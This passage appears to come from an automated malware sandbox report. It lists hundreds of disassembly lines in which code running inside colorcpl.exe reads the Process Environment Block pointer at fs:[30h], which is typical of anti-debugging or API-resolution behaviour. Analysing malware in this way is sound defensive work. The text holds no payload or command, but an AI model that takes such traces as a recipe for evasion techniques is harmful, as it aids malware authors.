              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DE10 mov eax, dword ptr fs:[00000030h]3_2_1E62DE10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EE1 mov eax, dword ptr fs:[00000030h]3_2_1E633EE1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FBEE6 mov eax, dword ptr fs:[00000030h]3_2_1E6FBEE6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FBEE6 mov eax, dword ptr fs:[00000030h]3_2_1E6FBEE6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FBEE6 mov eax, dword ptr fs:[00000030h]3_2_1E6FBEE6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FBEE6 mov eax, dword ptr fs:[00000030h]3_2_1E6FBEE6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663EEB mov ecx, dword ptr fs:[00000030h]3_2_1E663EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663EEB mov eax, dword ptr fs:[00000030h]3_2_1E663EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663EEB mov eax, dword ptr fs:[00000030h]3_2_1E663EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EF4 mov eax, dword ptr fs:[00000030h]3_2_1E633EF4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EF4 mov eax, dword ptr fs:[00000030h]3_2_1E633EF4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633EF4 mov eax, dword ptr fs:[00000030h]3_2_1E633EF4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E62BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E62BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63BEC0 mov eax, dword ptr fs:[00000030h]3_2_1E63BEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FEC0 mov eax, dword ptr fs:[00000030h]3_2_1E65FEC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFEC5 mov eax, dword ptr fs:[00000030h]3_2_1E6BFEC5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9EDF mov eax, dword ptr fs:[00000030h]3_2_1E6E9EDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9EDF mov eax, dword ptr fs:[00000030h]3_2_1E6E9EDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDEAA mov eax, dword ptr fs:[00000030h]3_2_1E6BDEAA
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FEA0 mov eax, dword ptr fs:[00000030h]3_2_1E62FEA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DEA5 mov eax, dword ptr fs:[00000030h]3_2_1E62DEA5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DEA5 mov ecx, dword ptr fs:[00000030h]3_2_1E62DEA5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov ecx, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6DDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDEB0 mov eax, dword ptr fs:[00000030h]3_2_1E6EDEB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E663E8F mov eax, dword ptr fs:[00000030h]3_2_1E663E8F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDE9B mov eax, dword ptr fs:[00000030h]3_2_1E6BDE9B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637E96 mov eax, dword ptr fs:[00000030h]3_2_1E637E96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65BF60 mov eax, dword ptr fs:[00000030h]3_2_1E65BF60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6AFF42 mov eax, dword ptr fs:[00000030h]3_2_1E6AFF42
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631F50 mov eax, dword ptr fs:[00000030h]3_2_1E631F50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E667F51 mov eax, dword ptr fs:[00000030h]3_2_1E667F51
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDF2F mov eax, dword ptr fs:[00000030h]3_2_1E6EDF2F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D7F3E mov eax, dword ptr fs:[00000030h]3_2_1E6D7F3E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B1F13 mov eax, dword ptr fs:[00000030h]3_2_1E6B1F13
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDF10 mov eax, dword ptr fs:[00000030h]3_2_1E6BDF10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFEC mov eax, dword ptr fs:[00000030h]3_2_1E66BFEC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFEC mov eax, dword ptr fs:[00000030h]3_2_1E66BFEC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFEC mov eax, dword ptr fs:[00000030h]3_2_1E66BFEC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633FC2 mov eax, dword ptr fs:[00000030h]3_2_1E633FC2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661FCD mov eax, dword ptr fs:[00000030h]3_2_1E661FCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661FCD mov eax, dword ptr fs:[00000030h]3_2_1E661FCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661FCD mov eax, dword ptr fs:[00000030h]3_2_1E661FCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EBFC0 mov ecx, dword ptr fs:[00000030h]3_2_1E6EBFC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EBFC0 mov eax, dword ptr fs:[00000030h]3_2_1E6EBFC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703FC0 mov eax, dword ptr fs:[00000030h]3_2_1E703FC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BFD0 mov eax, dword ptr fs:[00000030h]3_2_1E62BFD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3FD7 mov eax, dword ptr fs:[00000030h]3_2_1E6B3FD7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BFB0 mov eax, dword ptr fs:[00000030h]3_2_1E66BFB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E671FB8 mov eax, dword ptr fs:[00000030h]3_2_1E671FB8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FF90 mov edi, dword ptr fs:[00000030h]3_2_1E62FF90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov ecx, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641F92 mov eax, dword ptr fs:[00000030h]3_2_1E641F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3F90 mov eax, dword ptr fs:[00000030h]3_2_1E6D3F90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D3F90 mov eax, dword ptr fs:[00000030h]3_2_1E6D3F90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641C60 mov eax, dword ptr fs:[00000030h]3_2_1E641C60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E661C7C mov eax, dword ptr fs:[00000030h]3_2_1E661C7C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFC4F mov eax, dword ptr fs:[00000030h]3_2_1E6EFC4F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov eax, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov ecx, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov eax, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627C40 mov eax, dword ptr fs:[00000030h]3_2_1E627C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDC27 mov eax, dword ptr fs:[00000030h]3_2_1E6FDC27
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDC27 mov eax, dword ptr fs:[00000030h]3_2_1E6FDC27
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDC27 mov eax, dword ptr fs:[00000030h]3_2_1E6FDC27
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E701C3C mov eax, dword ptr fs:[00000030h]3_2_1E701C3C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B9C32 mov eax, dword ptr fs:[00000030h]3_2_1E6B9C32
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BC3B mov esi, dword ptr fs:[00000030h]3_2_1E66BC3B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70BC01 mov eax, dword ptr fs:[00000030h]3_2_1E70BC01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E70BC01 mov eax, dword ptr fs:[00000030h]3_2_1E70BC01
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BBC10 mov eax, dword ptr fs:[00000030h]3_2_1E6BBC10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BBC10 mov eax, dword ptr fs:[00000030h]3_2_1E6BBC10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BBC10 mov ecx, dword ptr fs:[00000030h]3_2_1E6BBC10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1CF9 mov eax, dword ptr fs:[00000030h]3_2_1E6D1CF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1CF9 mov eax, dword ptr fs:[00000030h]3_2_1E6D1CF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D1CF9 mov eax, dword ptr fs:[00000030h]3_2_1E6D1CF9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641CC7 mov eax, dword ptr fs:[00000030h]3_2_1E641CC7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E641CC7 mov eax, dword ptr fs:[00000030h]3_2_1E641CC7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665CC0 mov eax, dword ptr fs:[00000030h]3_2_1E665CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E665CC0 mov eax, dword ptr fs:[00000030h]3_2_1E665CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3CDB mov eax, dword ptr fs:[00000030h]3_2_1E6B3CDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3CDB mov eax, dword ptr fs:[00000030h]3_2_1E6B3CDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6B3CDB mov eax, dword ptr fs:[00000030h]3_2_1E6B3CDB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFCDF mov eax, dword ptr fs:[00000030h]3_2_1E6DFCDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFCDF mov eax, dword ptr fs:[00000030h]3_2_1E6DFCDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFCDF mov eax, dword ptr fs:[00000030h]3_2_1E6DFCDF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627CD5 mov eax, dword ptr fs:[00000030h]3_2_1E627CD5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62DCA0 mov eax, dword ptr fs:[00000030h]3_2_1E62DCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EFCAB mov eax, dword ptr fs:[00000030h]3_2_1E6EFCAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov ecx, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov eax, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov eax, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov eax, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E65FCA0 mov eax, dword ptr fs:[00000030h]3_2_1E65FCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov ecx, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BCA0 mov eax, dword ptr fs:[00000030h]3_2_1E66BCA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633C84 mov eax, dword ptr fs:[00000030h]3_2_1E633C84
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6DFD78 mov eax, dword ptr fs:[00000030h]3_2_1E6DFD78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637D75 mov eax, dword ptr fs:[00000030h]3_2_1E637D75
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E637D75 mov eax, dword ptr fs:[00000030h]3_2_1E637D75
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9D70 mov eax, dword ptr fs:[00000030h]3_2_1E6E9D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6E9D70 mov eax, dword ptr fs:[00000030h]3_2_1E6E9D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E627D41 mov eax, dword ptr fs:[00000030h]3_2_1E627D41
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov ecx, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D40 mov eax, dword ptr fs:[00000030h]3_2_1E643D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BD4E mov eax, dword ptr fs:[00000030h]3_2_1E66BD4E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BD4E mov eax, dword ptr fs:[00000030h]3_2_1E66BD4E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDD47 mov eax, dword ptr fs:[00000030h]3_2_1E6BDD47
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6F1D5A mov eax, dword ptr fs:[00000030h]3_2_1E6F1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFD2A mov eax, dword ptr fs:[00000030h]3_2_1E6BFD2A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BFD2A mov eax, dword ptr fs:[00000030h]3_2_1E6BFD2A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E643D00 mov eax, dword ptr fs:[00000030h]3_2_1E643D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6FDDC6 mov eax, dword ptr fs:[00000030h]3_2_1E6FDDC6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDDC7 mov eax, dword ptr fs:[00000030h]3_2_1E6EDDC7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDDC0 mov eax, dword ptr fs:[00000030h]3_2_1E6BDDC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633DD0 mov eax, dword ptr fs:[00000030h]3_2_1E633DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E633DD0 mov eax, dword ptr fs:[00000030h]3_2_1E633DD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E669DAF mov eax, dword ptr fs:[00000030h]3_2_1E669DAF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E63FDA9 mov eax, dword ptr fs:[00000030h]3_2_1E63FDA9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov eax, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C5DA0 mov ecx, dword ptr fs:[00000030h]3_2_1E6C5DA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DDB1 mov eax, dword ptr fs:[00000030h]3_2_1E64DDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6BDDB1 mov eax, dword ptr fs:[00000030h]3_2_1E6BDDB1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62FD80 mov eax, dword ptr fs:[00000030h]3_2_1E62FD80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov eax, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov eax, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E629D96 mov ecx, dword ptr fs:[00000030h]3_2_1E629D96
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6C3A78 mov eax, dword ptr fs:[00000030h]3_2_1E6C3A78
